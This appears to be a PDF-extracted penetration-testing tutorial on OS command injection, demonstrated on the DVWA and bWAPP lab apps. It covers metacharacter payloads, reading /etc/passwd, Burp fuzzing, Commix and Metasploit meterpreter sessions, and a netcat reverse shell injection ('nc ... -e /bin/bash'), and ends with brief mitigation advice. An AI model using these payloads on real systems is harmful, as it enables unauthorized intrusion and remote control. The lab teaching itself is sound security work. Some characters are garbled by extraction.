Comprehensive Guide on OS Command Injec�on

1|Page
 Comprehensive Guide on OS Command Injection

Contents
Introduc�on ............................................................................................................................................ 3
Introduc�on to Command Injec�on ....................................................................................................... 3
How Command Injec�on Occurs?........................................................................................................... 3
Metacharacters ....................................................................................................................................... 4
Types of Command Injec�on .................................................................................................................. 4
Impact of OS Command Injec�on ........................................................................................................... 5
Steps to exploit – OS Command Injec�on............................................................................................... 5
Manual Exploita�on ................................................................................................................................ 5
Basic OS Command injec�on .............................................................................................................. 5
Bypass a Blacklist implemented .......................................................................................................... 7
Exploita�on through Automated tools ................................................................................................... 7
Command Injec�on using BurpSuite................................................................................................... 8
Manual ............................................................................................................................................ 8
Fuzzing........................................................................................................................................... 10
OS Command Injec�on using Commix .............................................................................................. 14
OS Command Injec�on using Metasploit.......................................................................................... 18
Blind OS Command Injec�on ................................................................................................................ 20
Detec�on of Blind OS Command Injec�on ....................................................................................... 20
Exploi�ng Blind OS Command Injec�on using Netcat ...................................................................... 22
Mi�ga�on – OS Command Injec�on ..................................................................................................... 23

2|Page
 Comprehensive Guide on OS Command Injection

Introduction
Isn’t it great if you get the privilege to run any system commands directly on the target’s server
through its hosted web-applica�on? Or you can get the reverse shell with some simple clicks? In this
ar�cle, we’ll learn about OS Command Injec�on, in which an atacker is able to trigger some arbitrary
system shell commands on the hosted opera�ng system via a vulnerable web-applica�on.

Introduction to Command Injection

Command Injec�on also referred to as Shell Injec�on or OS Injec�on. It arises when an atacker tries
to perform system-level commands directly through a vulnerable applica�on in order to retrieve
informa�on of the webserver or try to make unauthorized access into the server. Such an atack is
possible only when the user-supplied data is not properly validated before passing to the server. This
user data could be in any form such as forms, cookies, HTTP headers, etc.

How Command Injection Occurs?

There are many situa�ons when the developers try to include some func�onali�es into their web
applica�on by making the use of the opera�ng system commands. However, if the applica�on passes
the user-supplied input directly to the server without any valida�on, thus the applica�on might
become vulnerable to command injec�on atacks.

In order to clear the vision, let’s consider this scenario:

Think for a web-applica�on providing func�onality that any user can ping any par�cular IP address
through his web-interface in order to confirm the host connec�on, which means that the applica�on
is passing the ping command with that par�cular input IP directly to the server.

Now if an atacker injects an unwanted system command adding up with the basic ping command
using some metacharacters. Thus the web-applica�on pass it all to the server directly for execu�on,

3|Page
 Comprehensive Guide on OS Command Injection

allowing the atacker to gain the complete access of the opera�ng system, start or stop a par�cular
service, view or delete any system file and even captures a remote shell.

Metacharacters
Metacharacters are the symbolic operators which are used to separate the actual commands from
the unwanted system commands. The semicolon (;) and the ampercent (&) are majorly used as
separators that divides the authen�c input command and the command that we are trying to inject.

The commonly used metacharacters are:

Types of Command Injection

Error based injec�on: When an atacker injects a command through an input parameter and the
output of that command is displayed on the certain web page, it proves that the applica�on is
vulnerable to the command injec�on. The displayed result might be in the form of an error or the
actual outcomes of the command that you tried to run. An atacker then modifies and adds
addi�onal commands depending on the shell the webserver and assembles informa�on from the
applica�on.

4|Page
 Comprehensive Guide on OS Command Injection

Blind based Injec�on: The results of the commands that you inject will not be displayed to the
atacker and no error messages are returned. The atacker might use another technique to iden�fy
whether the command was really executed on the server or not.

The OS Command Injec�on vulnerability is one of the top 10 OWASP vulnerabili�es. Therefore let’s
have a look onto its impact.

Impact of OS Command Injection

OS command injec�on is one of the most powerful vulnerability with “High Severity having a CVSS
Score of 8”.

Thus, this injec�on is reported under:

1. CWE-77: Improper Neutraliza�on of Special Elements used in a Command.

2. CWE-78: Improper Neutraliza�on of Special Elements used in an OS Command.

Wonder how to exploit this vulnerability? Let’s check out its steps:

Steps to exploit – OS Command Injection

1. Iden�fy the input field
2. Understand the func�onality
3. Try the Ping method �me delay
4. Use various operators to exploit OS Command Injec�on
So, I guess un�l now you might be having a clear vision with the concept of OS command injec�on
and its methodology. But before making our hands wet with the atacks let’s clear one more thing i.e.

“Command Injec�on differs from Code Injec�on”, in that code injec�on allows the atacker to add
their own code that is then executed by the applica�on. In Command Injec�on, the atacker extends
the default func�onality of the applica�on, which execute system commands, without the necessity
of injec�ng code. Source:

htps://www.owasp.org/index.php/Command_Injec�on

Let’s Start!!

Manual Exploitation
Basic OS Command injection
I’ve opened the target IP in my browser and logged in into DVWA as admin: password, from the
DVWA security op�on I’ve set the security level to low. Now I’ve opted for the Command Injec�on
vulnerability present on the le�-hand side of the window.

I’ve been presented with a form which is suffering from OS command injec�on vulnerability asking to
“Enter an IP address:”.

From the below image you can see that, I’ve tried to ping its localhost by typing 127.0.0.1, and
therefore I got the output result.

5|Page
 Comprehensive Guide on OS Command Injection

In order to perform the “Basic OS Command Injec�on atack”, I’ve used the “; (semicolon)” as a
metacharacter and entered another arbitary command i.e. “ls”

127.0.0.1;ls

From the below image you can see that the “;” metacharacter did its work, and we are able to list the
contents of the directory where the applica�on actually is. Similarly we can run the other system
commands such as “;pwd”, “;id” etc.

6|Page
 Comprehensive Guide on OS Command Injection

Bypass a Blacklist implemented

Many �mes the developers set up a blacklist of the commonly used metacharacters i.e. of “&”, “;”,
”&&”, “||”, “#” and the other ones to protect their web-applica�ons from the command injec�on
vulnerabili�es.

Therefore, in order to bypass this blacklist, we need to try all the different metacharacters that the
developer forgot to add.

I’ve increased up the security level too high and tried up with all the different combina�ons of
metacharacters.

From the above image, you can see that I’ve successfully captured the password file by using the
metacharacter “|”

127.0.0.1 |cat /etc/passwd

7|Page
 Comprehensive Guide on OS Command Injection

Exploitation through Automated tools

Command Injection using BurpSuite
Burpsuite is considered as one of the best and the most powerful tool for web-penetra�on tes�ng.
So we’ll try to deface the web-applica�on through it.

Manual
I’ve now logged in into bWAPP with bee : bug by running up the target’s IP into the browser, and
have even set the security level to medium and “Choose your bug” op�on to “OS Command
Injec�on”.

Let’s try to enumerate this “DNS lookup” form by clicking on the Lookup buton and simply
capturing the browser’s request in the proxy tab and sending the same to the Repeater.

8|Page
 Comprehensive Guide on OS Command Injection

Now I just need to manipulate the target by adding up some system commands i.e. “pwd” with the
help of metacharacters.

In this I’ve used “|” as the delimiter, you can choose yours.

As soon as I click on the Go tab, the response starts genera�ng and on the right-hand side of the
window you can see that I’ve captured the working directory.

9|Page
 Comprehensive Guide on OS Command Injection

Fuzzing
In the last scenario, while bypassing the implemented blacklist, we were lucky that the developer
had created and set up the list with the limited combina�on of metacharacters. But s�ll, it took �me,
to check for every possible combina�on of the metacharacters. And therefore it is obvious that this
metacharacter would not work with every web-applica�on, thus in order to bypass these differently
generated blacklists, we’ll be doing a fuzzing atack.

Let’s check it out how!!

I’ve created a dic�onary with all the possible combina�ons of the metacharacters and now will
simply include it into my atack.

Tune in you burp suite and start intercep�ng the request, as soon as you capture the ongoing
request send the same to the intruder by simply doing a right-click on the proxy tab and choose the
op�on to send to intruder.

10 | P a g e
 Comprehensive Guide on OS Command Injection

Now we’ll set up the atack posi�on by simply shi�ing the current tab to the Posi�ons tab, and
selec�ng the area where we want to make the atack happen with the ADD buton.

Time to inject our dic�onary, now move to the Payload tab and click on the load buton in order to
load our dic�onary file.

11 | P a g e
 Comprehensive Guide on OS Command Injection

As soon as I fire up the Start Atack buton, a new window will pop up with the fuzzing atack.

From the below screenshot, it’s clear that our atack has been started and there is a fluctua�on in
the length sec�on. I’ve double-clicked on the length field in order to get the highest value first.

12 | P a g e
 Comprehensive Guide on OS Command Injection

From the image below, you can see that as soon as I clicked over the 11th Request, I was able to
detect the ls command running in the response tab.

13 | P a g e
 Comprehensive Guide on OS Command Injection

OS Command Injection using Commix

Some�mes fuzzing consumes a lot of �me, and even it becomes somewhat frustra�ng while
performing a command injec�on atack over it i.e. wait for the incremented length and check for
every possible response it drops.

In order to make our atack simpler and faster, we’ll be using a python scripted automated tool
“Commix”, which makes it very easy to find the command injec�on vulnerability and then helps us to
exploit it. You can learn more about Commix from here.

So let’s try to drop down the web-applica�on again by ge�ng a commix session in our kali machine.

From the below image you can see that I’ve set the security level too high and opted the “Choose
your bug” op�on to “OS Command Injec�on”.

14 | P a g e
 Comprehensive Guide on OS Command Injection

Commix works on cookies. Thus in order to get them, I’ll be capturing the browser’s request into my
burpsuite, by simply enabling the proxy and the intercept op�ons, further as I hit up the Lookup
buton, I’ll be presented with the details into the burpsuite’s Proxy tab.

Fire up you Kali Terminal with commix and run the following command with the Referer, Cookie, and
target values:

commix --url="http://192.168.0.11/bWAPP/commandi.php" --cookie="security_level=2;

PHPSESSID=cc91040cc70b9abdb2fdc637527bf132" --data="target=www.nsa.gov&form=submit"
Type ‘y’ to resume the classic injec�on point and to the pseudo-terminal shell.

15 | P a g e
 Comprehensive Guide on OS Command Injection

Great!! We’re into our target machine.

What if we could convert this commix shell into a meterpreter one?

As soon as we capture the commix session, we’ll try to generate a reverse meterpreter session of the
target machine by execu�ng the following commands:

reverse_tcp
set lhost 192.168.0.9
set lport 4444
As we hit enter, it will ask us to choose whether we want a netcat shell or some other (meterpreter)
one. Choose op�on 2 and hit enter again.

Now you’ll be popped up with a new list of sessions asking for which meterpreter session you want
as in whether you want it to be PHP, Windows, python etc. As our target server is running over the
PHP framework, we will select op�on 8 i.e. a PHP meterpreter reverse shell.

16 | P a g e
 Comprehensive Guide on OS Command Injection

When everything is done, it will provide us with a resource file with an execu�on command. Open a
new terminal window and type the presented command there, as in our case it generated the
following command:

msfconsole -r /usr/share/commix/php_meterpreter.rc
Cool!! It’s great to see that our commix session is now having some new wings.

17 | P a g e
 Comprehensive Guide on OS Command Injection

OS Command Injection using Metasploit

Why drive so long in order to get a meterpreter session, if we can just gain it directly through the
Metasploit framework.

Let’s check it out how

Boot the Metasploit framework into your kali terminal by running up the simple command
“msfconsole”.

There are many different ways that provide us with our intended outcome. But we will use the
web_delivery exploit in order to find a way to transfer our malicious payload into the remote
machine.

Type the following commands to generate our payload:

use exploit/multi/script/web_delivery
Now it’s �me to choose our target.

Type “show targets” in order to get the complete list of all the in-built target op�ons.

set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.9
set lport 2222
exploit

18 | P a g e
 Comprehensive Guide on OS Command Injection

As soon as I hit enter a�er typing exploit, the Metasploit framework will generate the payload with
all the essen�als.

We are almost done, just simply include this payload with the command using any metacharacter.

Here I’ve used & (ampercent) so that the server executes both the commands one a�er the another.

From the below image you can see that we are into the target’s system again, but this �me we are
more powerful with the Metasploit session.

19 | P a g e
 Comprehensive Guide on OS Command Injection

Blind OS Command Injection

So un�l now, we were lucky enough that the web-applica�ons were returning the outputs from the
commands directly on the screen through their HTTP Responses. But there are many situa�ons when
the applica�ons do not return anything and s�ll run some system commands as into their backend
processes. So the ques�on arises - Do such web-applica�ons are vulnerable to command injec�on??

Let’s try to figure this out by using the most reliable method the �me-delay ping command which
will detect whether the applica�on is suffering from command injec�on or not.

Detection of Blind OS Command Injection

I’ve now logged in inside bWAPP and selected the “Choose you bug” op�on to “OS Command
Injec�on - Blind”. Further se�ng up the security level to medium.

Thus, I’ve been redirected to the web applica�on which is suffering from command injec�on
vulnerability.

Let’s check whether this applica�on is actually suffering from the OS Command Injec�on or not.

Enter any IP address in the field provided and turn on your burpsuite monitor in order to capture the
ongoing htp request, thus forwarding it all into the repeater tab.

20 | P a g e
 Comprehensive Guide on OS Command Injection

Now we’ll try to manipulate the request with

ping –c 10 192.168.0.9
As I clicked over the Go tab, it took about 10 seconds to display the response result. Thus confirms
up that this web-applica�on is suffering from OS Command Injec�on.

21 | P a g e
 Comprehensive Guide on OS Command Injection

Exploiting Blind OS Command Injection using Netcat

As of now, we are confirmed that the applica�on which we are trying to surf is suffering from
command injec�on vulnerability. Let’s try to trigger out this web-applica�on by genera�ng a reverse
shell using netcat.

From the below image you can see that I’ve checked my Kali machine’s IP address and set up the
netcat listener at port number 2000 using

nc –lvp 2000
where l = listen, v = verbose mode and p = port.

Now on the web applica�on, I’ve injected my netcat system command with the localhost command
into the input field i.e.

localhost|nc 192.168.0.9 –e /bin/bash

The –e /bin/bash empowers the netcat command to execute a bash shell on the listener machine.

22 | P a g e
 Comprehensive Guide on OS Command Injection

Great!! We are into the vic�m’s shell through our kali machine and we’re now able to run any system
command from here.

Mitigation – OS Command Injection

The developers should set up some strong server-side validated codes and implement a set of
whitelist commands. It only accepts the alphabet and the digits rather than the characters.

23 | P a g e
 Comprehensive Guide on OS Command Injection

You can check this all out from the following code snippet. It can protect the web-applica�ons from
exposing to command injec�on vulnerabili�es.

Avoid the applica�ons from calling out directly the OS system commands. If needed the developers
can use the build-in API for interac�ng with the Opera�ng System.

The developers should even ensure that the applica�on must be running under the least privileges.

To learn more about Website Hacking. Follow this Link.

24 | P a g e
 JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security

Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer

Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in